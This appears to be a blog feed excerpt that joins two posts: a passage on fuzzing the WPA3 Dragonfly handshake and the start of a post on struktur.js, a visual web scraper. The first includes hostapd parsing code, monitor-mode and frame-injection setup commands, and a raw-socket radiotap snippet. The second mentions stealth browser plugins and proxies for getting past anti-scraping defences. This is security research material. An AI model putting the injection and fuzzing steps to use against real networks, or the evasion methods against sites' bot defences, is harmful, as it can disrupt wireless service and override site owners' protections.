<li><strong>Offline dictionary attack resistance</strong>: When recording the handshake exchange by a passive observer, the material collect cannot be used to launch a passive dictionary attack against the handshake. For example with the WPA 4-way handshake, a passive listener in the BSS can obtain key exchange data and launch a offline brute force attack on amazon web services with high computing resources.</li>
</ol>
<p>This <a href="https://tools.ietf.org/html/rfc7664">Dragonfly handshake</a> basically consists of two steps:</p>
<ol>
<li>Auth-Commit exchange: A online guess at the password is launched</li>
<li>Auth-Confirm exchange: Common knowledge of the password is confirmed</li>
</ol>
<p>Dragonfly is a password authenticated key exchange (PAKE). PAKE schemes essentially solve the asymmetric key distribution problem. The issue with public key cryptography is the difficulty of trust. For this reason a whole public key infrastructure based on certificates exists that essentially makes statements who is who and whom can be trusted.</p>
<p>Dragonfly is similar to the Diffie-Hellman key exchange. However, a important difference is that Dragonfly is authenticated. Diffie-Hellman is not authenticated, which is also the reason that attackers can launch a man in the middle attack against it. The Dragonfly participants need to possess a low entropy common secret (your wifi password) in order to exchange a secrete key. The password hashed together with the MAC addresses is used to derive a group element in the elliptic curve group. Then this group is used as a starting point of a modfied Diffie-Hellman key exchange. Without the correct password, an attacker cannot find the equivalent group element. Sounds complicated? Well it is.</p>
<figure>
<img src="/images/sae-exchange.png" alt="overview of the SAE exchange"/>
<figcaption>Figure 1: The cryptographic overview of the Dragonfly handshake</figcaption>
</figure>
<h2>Why fuzzing?</h2>
<p>Fuzzing is a common technique to trigger memory corruption vulnerabilities by creating and sending malformed inputs to the software being tested. </p>
<p>In years 2007 to 2009, Laurent Butti <a href="https://github.com/0xd012/wifuzzit">found many security vulnerabilities by using the predecessor of boofuzz, Sulley</a>. He fuzzed mainly authentication and association 802.11 management frames.</p>
<p>Not much has been done with fuzzing in the 802.11 security research since then. For this reason, I launched another attempt at the newly developed software for the WPA3 Dragonfly handshake.</p>
<p>Recently, the infamous researcher Maty Vanhoef (crack attacks) has published a couple of new security vulnerabilities in his <a href="https://wpa3.mathyvanhoef.com/">recent paper Dragonblood</a>. He mainly focuses on timing and and cache based side-channel attacks.</p>
<p>But why should we attempt to fuzz Dragonfly? After all, there are only two management frames exchanged in the authentication. There are a couple of reasons:</p>
<figure>
<img src="/images/commit-frame.png" alt="overview of the auth-commit frame"/>
<figcaption>Figure 2: An auth-commit frame has optional fields</figcaption>
</figure>
<h4>Anti Clogging Tokens</h4>
<p>Deriving the password element in the beginning of the Dragonfly handshake is a computationally costly operation. Therefore, the handshake is secured against DoS by a secret cookie that needs to be reflected when the AP sends it to the station. This cookie is essentially a SHA256 hash over the MAC addresses of the supplicant and a server secret. The anti-clogging token has no pre-defined length in the RFC. This means vendors have free choice there.</p>
<p>So if a supplicant sends an SAE auth-commit frame to the access point and the access point responds with a auth-commit frame with status <code>MMPDU_STATUS_CODE_ANTI_CLOGGING_TOKEN_REQ</code> set, the client has to reflect the cookie in a new auth commit frame. This exchange may produce interesting fuzzing possibilities:</p>
<ol>
<li>What happens when the client sends a auth-commit frame with the reflected anti-clogging token but a different payload? Different group id? Or same group id but cryptographic payload for FFC instead of ECC?</li>
</ol>
<h4>Password Identifiers</h4>
<p>Dragonfly authentication frames may include a password identifier. Password identifiers are labels that are mapped to a certain password. They are used to tell the AP what password should be used for the authentication. The function below shows how password identifiers are parsed in <strong>hostapd 2.8</strong>. So each password identifier has a 3 byte header. A password identifier is located after the scalar and elements or after the scalar and elements and a potential anti-clogging token. There is no real standardization where the password identifier must be located. </p>
<div class="highlight"><pre><span></span><code><span class="k">static</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="nf">sae_is_password_id_elem</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">*</span><span class="n">end</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">pos</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">pos</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">WLAN_EID_EXTENSION</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">pos</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">pos</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="n">pos</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">pos</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">WLAN_EID_EXT_PASSWORD_IDENTIFIER</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Even the source code responsible for parsing the password identifier complains about the ambiguity of parsing the password identifier.</p>
<div class="highlight"><pre><span></span><code><span class="k">static</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="nf">sae_parse_commit_token</span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sae_data</span><span class="w"> </span><span class="o">*</span><span class="n">sae</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">**</span><span class="n">pos</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">*</span><span class="n">end</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">**</span><span class="n">token</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="o">*</span><span class="n">token_len</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">scalar_elem_len</span><span class="p">,</span><span class="w"> </span><span class="n">tlen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">u8</span><span class="w"> </span><span class="o">*</span><span class="n">elem</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">token</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">token</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">token_len</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">token_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">scalar_elem_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">sae</span><span class="o">-></span><span class="n">tmp</span><span class="o">-></span><span class="n">ec</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">sae</span><span class="o">-></span><span class="n">tmp</span><span class="o">-></span><span class="n">prime_len</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">scalar_elem_len</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="w"> </span><span class="p">(</span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="p">))</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"> </span><span class="cm">/* No extra data beyond peer scalar and element */</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* It is a bit difficult to parse this now that there is an</span>
<span class="cm"> * optional variable length Anti-Clogging Token field and</span>
<span class="cm"> * optional variable length Password Identifier element in the</span>
<span class="cm"> * frame. We are sending out fixed length Anti-Clogging Token</span>
<span class="cm"> * fields, so use that length as a requirement for the received</span>
<span class="cm"> * token and check for the presence of possible Password</span>
<span class="cm"> * Identifier element based on the element header information.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="n">tlen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">end</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">pos</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">scalar_elem_len</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">tlen</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">SHA256_MAC_LEN</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_printf</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"SAE: Too short optional data (%u octets) to include our Anti-Clogging Token"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="p">)</span><span class="w"> </span><span class="n">tlen</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_printf</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"SAE: Potential Anti-Clogging Token"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">elem</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">scalar_elem_len</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">sae_is_password_id_elem</span><span class="p">(</span><span class="n">elem</span><span class="p">,</span><span class="w"> </span><span class="n">end</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Password Identifier element takes out all available</span>
<span class="cm"> * extra octets, so there can be no Anti-Clogging token in</span>
<span class="cm"> * this frame. */</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_printf</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"SAE: No password ident after scalar and element"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">elem</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="n">SHA256_MAC_LEN</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">sae_is_password_id_elem</span><span class="p">(</span><span class="n">elem</span><span class="p">,</span><span class="w"> </span><span class="n">end</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Password Identifier element is included in the end, so</span>
<span class="cm"> * remove its length from the Anti-Clogging token field. */</span><span class="w"></span>
<span class="w"> </span><span class="n">tlen</span><span class="w"> </span><span class="o">-=</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">elem</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_printf</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"SAE: No password ident after scalar and element and anti-clogging-token"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">wpa_hexdump</span><span class="p">(</span><span class="n">MSG_INFO</span><span class="p">,</span><span class="w"> </span><span class="s">"SAE: Anti-Clogging Token"</span><span class="p">,</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="p">,</span><span class="w"> </span><span class="n">tlen</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">token</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">token</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">token_len</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">token_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tlen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">pos</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="n">tlen</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<h4>Vendor Specific Parsing</h4>
<p>The <a href="https://mentor.ieee.org/802.11/dcn/19/11-19-0387-02-000m-addressing-some-sae-comments.docx">discussion in IEEE groups show</a> impressively that the programmers have many misunderstandings and misconceptions about the implementation of Dragonfly. This is usually a good indicator that there will be errors.</p>
<h4>Multiple Cryptographic Structures supported</h4>
<p>Dragonfly supports Finite Field Cryptography and Elliptic Curve Cryptography. This means that the kind of cryptography has to be detected on contents of the frames. This is bad practice at least. Most real world implementations exclusively use ECC.</p>
<h2>Setting up the testing environment</h2>
<p>Playing around in 802.11 involves a lot of pain and frustration. Often things don't work out as described in the Internet. In the following section, we will use the awesome <strong>mac80211_hwsim</strong> radio simulation kernel module. All software and instructoins have been tested an run on <strong>Ubuntu 18.04</strong>.</p>
<p>The testing environment is created via hardware simulation of WiFi radios.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># kill all interfering daemons such as network-manager</span>
sudo pkill wpa_supplicant
sudo service network-manager stop
<span class="c1"># create 3 virtual 802.11 radios named wlan0, wlan1, wlan2</span>
sudo modprobe mac80211_hwsim <span class="nv">radios</span><span class="o">=</span><span class="m">2</span>
rfkill unblock wifi
</code></pre></div>
<p>Enable monitoring of radio simulation traffic in wireshark with:</p>
<div class="highlight"><pre><span></span><code>sudo ifconfig hwsim0 up
</code></pre></div>
<p>Now you may observe the simulated traffic on the interface <strong>hwsim0</strong>.</p>
<h4>Before Fuzzing</h4>
<p>Sources:
1. <a href="https://stackoverflow.com/questions/48271119/how-to-send-both-802-11-management-frames-and-data-frames-using-raw-sockets-in-l">How to use raw sockets in 802.11</a>
2. <a href="https://www.aircrack-ng.org/doku.php?id=injection_test">Injection Test</a></p>
<p>Before starting, it might be worthwhile to find out the details of your wireless card. You can do so with the command <code>sudo lshw -class network</code>. In my case, the output is the following:</p>
<div class="highlight"><pre><span></span><code>$ sudo lshw -class network
<span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> nikolai:
*-network
description: Wireless interface
product: Centrino Advanced-N <span class="m">6235</span>
vendor: Intel Corporation
physical id: <span class="m">0</span>
bus info: pci@0000:02:00.0
logical name: wlan0
version: <span class="m">24</span>
serial: <span class="m">00</span>:00:00:00:00:00 <span class="c1"># i changed this for obvious reasons</span>
width: <span class="m">64</span> bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: <span class="nv">broadcast</span><span class="o">=</span>yes <span class="nv">driver</span><span class="o">=</span>iwlwifi <span class="nv">driverversion</span><span class="o">=</span><span class="m">4</span>.15.0-39-generic <span class="nv">firmware</span><span class="o">=</span><span class="m">18</span>.168.6.1 <span class="nv">ip</span><span class="o">=</span><span class="m">192</span>.168.0.4 <span class="nv">latency</span><span class="o">=</span><span class="m">0</span> <span class="nv">link</span><span class="o">=</span>yes <span class="nv">multicast</span><span class="o">=</span>yes <span class="nv">wireless</span><span class="o">=</span>IEEE <span class="m">802</span>.11
resources: irq:32 memory:f7d00000-f7d01fff
</code></pre></div>
<p>This gives you the interface name, driver used, MAC address of the card and so on.</p>
<p>In order to send management, data or any type of pure raw packet from a wireless interface you have to do the following:</p>
<p>Make sure the wireless interface hardware supports packet injection in monitor mode.</p>
<ul>
<li>To check the capabilities of your WiFi card, you can check the following command: <code>iw list | grep -A7 "interface modes:"</code> If it outputs <strong>monitor</strong>, you are good to go.</li>
<li>To confirm injection tests, you can use <code>aireplay-ng -9 -e teddy -a 00:de:ad:ca:fe:00 -i {AP interface} {STA interface}</code></li>
</ul>
<p>Then put the wireless interface in monitor mode with</p>
<div class="highlight"><pre><span></span><code><span class="c1"># the first commands kill interfering processes</span>
airmon-ng check <span class="nb">kill</span>
service network-manager stop
pkill wpa_supplicant
<span class="c1"># this puts the card in monitor mode</span>
ifconfig <span class="o">{</span>dev<span class="o">}</span> down
iwconfig <span class="o">{</span>dev<span class="o">}</span> mode monitor
ifconfig <span class="o">{</span>dev<span class="o">}</span> up
<span class="c1"># this sets the appropriate channel</span>
iwconfig <span class="o">{</span>dev<span class="o">}</span> channel <span class="o">{</span>channel<span class="o">}</span>
</code></pre></div>
<p>Then you can create a raw socket in python via </p>
<div class="highlight"><pre><span></span><code><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_PACKET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_RAW</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">htons</span><span class="p">(</span><span class="n">ETH_P_ALL</span><span class="p">))</span>
<span class="n">s</span><span class="o">.</span><span class="n">bind</span><span class="p">((</span><span class="n">dev</span><span class="p">,</span> <span class="n">ETH_P_ALL</span><span class="p">))</span>
</code></pre></div>
<p>Finally, Build and append at the beginning, the appropriate radiotap header while building your wireless 802.11 packet for management and control frames. Since you are basically bypassing all lower lever wireless drivers (which handles management and control frames), it becomes your job to include the radiotap header. <a href="https://www.radiotap.org/">Info about radiotap header.</a></p>
<h4>Radiotap Header</h4>
<p>We need to include a radiotap header in our raw frames. </p>
<p>The radiotap header format is a mechanism to supply additional information about frames, from the driver to userspace applications such as libpcap, and from a userspace application to the driver for transmission. Designed initially for NetBSD systems by David Young, the radiotap header format provides more flexibility than the Prism or AVS header formats and allows the driver developer to specify an arbitrary number of fields based on a bitmask presence field in the radiotap header (<a href="https://www.radiotap.org/">Source</a>)</p>
<p>The radiotap header is not actually included in 802.11 frames that are sent over the air, it is merely an additional layer of information that is added by the wireless device/driver and passed into userland. A very good introduction by Andy Green to radiotap headers <a href="https://www.kernel.org/doc/Documentation/networking/mac80211-injection.txt">can be found here</a>. The 802.11 driver subsystem <strong>mac80211</strong> requires all injected packets to have a radiotap header. Another <a href="https://www.linux.com/blog/linux-wireless-networking-short-walk">very good blog post</a> that explains the linux wireless subsystem and the paths that management frames and data frames take within the 802.11 linux system.</p>
<p>Now the question poses itself if it is possible to fuzz radiotap headers?</p>
<p>We will use the smallest possible radiotap header in <code>dragonfuzz.py</code> and let the 802.11 driver derive the proper values.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># no flags present, let the 802.11 driver add the stuff</span>
<span class="n">DEFAULT_RADIOTAP_HEADER</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x00\x00\x08\x00\x00\x00\x00\x00</span><span class="s1">'</span>
</code></pre></div>Struktur: A completely new approach to web scraping2019-07-15T16:00:00+02:002019-07-15T16:00:00+02:00Nikolai Tschachertag:incolumitas.com,2019-07-15:/2019/07/15/web-scraping-without-css-selectors/<p>I will shop an alternative approach to web scraping without using css selectors and XPath queries. We make use of the fact that most web pages visually render the information of interest in a coherent, structured way. This technique requires a remotely controllable web browser such as puppeteer, that is capable of rendering web pages visually.</p><p>For the past couple of years, I spent a lot of time creating web scrapers and information extraction tools for clients and <a href="https://scrapeulous.com/">my own service</a>. Recently, I had an idea how I can improve the quality of results while spending less time on data extraction rules. The result of this work is the experimental javascript project <a href="https://github.com/NikolaiT/struktur"><strong>struktur.js</strong></a>.</p>
<p>Web scraping is soul crushing work. There are mainly <strong>two reasons</strong> for that:</p>
<h3>Reason 1: CSS Selectors and XPath queries are hard to maintain</h3>
<p>Whenever the websites markup changes, you need to adapt your selectors. Furthermore, those selectors assume a static response from the scraped web server. If the structure changes slightly, the predefined CSS selectors fail miserably and the complete scrape job has to be restarted.</p>
<p>Many websites also have randomized class names and ID's in their HTML markup, such that those attributes carry no semantic information and cannot be used in CSS selectors. For example, this is html that google returns in their markup:</p>
<figure>
<img src="/images/badhtml.png" alt="bad html in google markup" style="width: 800px;"/>
<figcaption>Figure 1: Google randomises class names and makes it hard to figure out semantically rich CSS selectors</figcaption>
</figure>
<p>In our modern times, many websites are written in a Javascript frontend framework such as Angular or ReactJS. This increases the trend of class names with no semantic relation to its content.</p>
<p>I finally decided to think of an alternative ways of web scraping, when I had to commit the following code into <a href="https://github.com/NikolaiT/se-scraper">se-scraper</a>:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// parse right side product information</span>
<span class="kd">var</span> <span class="nx">right_side_info</span> <span class="o">=</span> <span class="p">{};</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">review</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs .cu-container g-review-stars span'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'aria-label'</span><span class="p">);</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">title</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs .cu-container g-review-stars'</span><span class="p">).</span><span class="nx">parent</span><span class="p">().</span><span class="nx">find</span><span class="p">(</span><span class="s1">'div:first-child'</span><span class="p">).</span><span class="nx">text</span><span class="p">();</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">num_reviews</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs .cu-container g-review-stars'</span><span class="p">).</span><span class="nx">parent</span><span class="p">().</span><span class="nx">find</span><span class="p">(</span><span class="s1">'div:nth-of-type(2)'</span><span class="p">).</span><span class="nx">text</span><span class="p">();</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">vendors</span> <span class="o">=</span> <span class="p">[];</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">info</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs_block > div > div > div > div:nth-child(5) > div > div'</span><span class="p">).</span><span class="nx">text</span><span class="p">();</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'#rhs .cu-container .rhsvw > div > div:nth-child(4) > div > div:nth-child(3) > div'</span><span class="p">).</span><span class="nx">each</span><span class="p">((</span><span class="nx">i</span><span class="p">,</span> <span class="nx">element</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">right_side_info</span><span class="p">.</span><span class="nx">vendors</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span>
<span class="nx">price</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-of-type(1)'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">merchant_name</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(3) a:nth-child(2)'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">merchant_ad_link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(3) a:first-child'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">merchant_link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(3) a:nth-child(2)'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">source_name</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(4) a'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">source_link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:nth-child(4) a'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">info</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'div span'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">shipping</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">element</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'span:last-child > span'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="p">})</span>
<span class="p">});</span>
</code></pre></div>
<p>This code is ugly and probably breaks in a couple of weeks. Then I need at least two hours of my time to fix it. I simply cannot do this for 10 different websites where I have to maintain a different set of scraping rules via CSS selectors.</p>
<h3>Reason 2: Websites have built in defenses against web scraping</h3>
<p>Of course it is reasonable to protect yourself against excessive and malicious scraping attempts. Nobody wants to have their
whole body of data scraped by third parties. The reason is obvious: The worth of many providers is constituted by the richness of
information they have. For example Linkedin's sole worth depends on the information monopoly about people in the business workforce. For this reason, they employ very strict defenses against large scale scraping.</p>
<p>Those defenses block clients based on</p>
<ul>
<li>IP addresses</li>
<li>User agents and other HTTP headers</li>
<li>whether the client has a javascript execution engine</li>
<li>number of interactions on the site, mouse movements, swiping behavior, pauses</li>
<li>whether the client has a previously known profile</li>
<li>captchas</li>
</ul>
<p>It all boils down to the question whether the client is a <strong>robot or human?</strong>. There is a large industry that tries to detect bots. Well known companies in this industry are Distil and <a href="https://www.imperva.com/products/bot-management/">Imperva</a>. They try to distinguish bots and humans by using machine learning models using indicators such as mouse movements, swipe behavior on mobile apps, accelerometer statistics and device fingerprints. This topic has enough depth for another major blog post and will not be researched here any further.</p>
<h2>Scraping without a single CSS selector - Detecting Structures</h2>
<p>We cannot make much against web scraping defenses, since they are implemented on the server side. We can only invest more in resources such as IP addresses or proxies to obtain a larger scraping infrastructure.</p>
<p>In this blog post, we will tackle the first issue, the problem of <strong>reliably detecting relevant structure across websites without using XPath or CSS selectors</strong>. What exactly is coherent structure?</p>
<p>In the remainder of this article, we define <strong>relevant structure to be a collection of similar objects which are of interest to the user.</strong> And our task is to recognize this structure on every webpage in the Internet. It is a collection, if there are at least <em>N</em> objects with the same <code>tagName</code> under a container node. The objects are similar, if their visible content is similar. Of course this is a circular definition, because it is still an open question how to exactly measure it.</p>
<h3>Examples of recurring structure</h3>
<figure>
<img src="/images/google.png" alt="google structure example" style="width: 800px;"/>
<figcaption>Figure 2: The Google Search Engine has 10 results objects that consist of a title, link and snippet.</figcaption>
</figure>
<figure>
<img src="/images/bing.png" alt="bing structure example" style="width: 800px;"/>
<figcaption>Figure 3: Bing has a very similar layout to Google.</figcaption>
</figure>
<figure>
<img src="/images/ebay.png" alt="ebay structure example" style="width: 800px;"/>
<figcaption>Figure 4: The ebay product search results page has many products that are rendered in a grid system and each share a product image, price and title.</figcaption>
</figure>
<p>All those items have a common structure when interpreted visually: They have more or less the same vertical alignment, the same font size, the same html tag within the same hierarchy level.</p>
<p>The huge problem is that structure is created dynamically from the interplay of HTML, JavaScript and CSS. This means that the HTML structure does not necessarily need to resemble the visual output. Therefore we need to operate on a rendered web page. This implies that we need to scrape with real, headless browsers using libraries such as <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a>.</p>
<h3>What assumptions do we make?</h3>
<p>The input is a website rendered by a modern browser with javascript support. We will use puppeteer to render websites and <strong>puppeteer-extra-plugin-stealth</strong> to appear like we use a real browser.</p>
<p>We assume that structure is what humans consider to be related structure.</p>
<ol>
<li>Reading goes from top-left to bottom-right</li>
<li>Identical horizontal/vertical alignment among objects</li>
<li>More or less same size of bounding rectangles of the object of interest</li>
<li>As output we are merely interested in Links, Text and Images (which are Links). The output needs to be visible/displayed in the DOM.</li>
<li>Only structure that takes a major part of the visible viewport is considered structure</li>
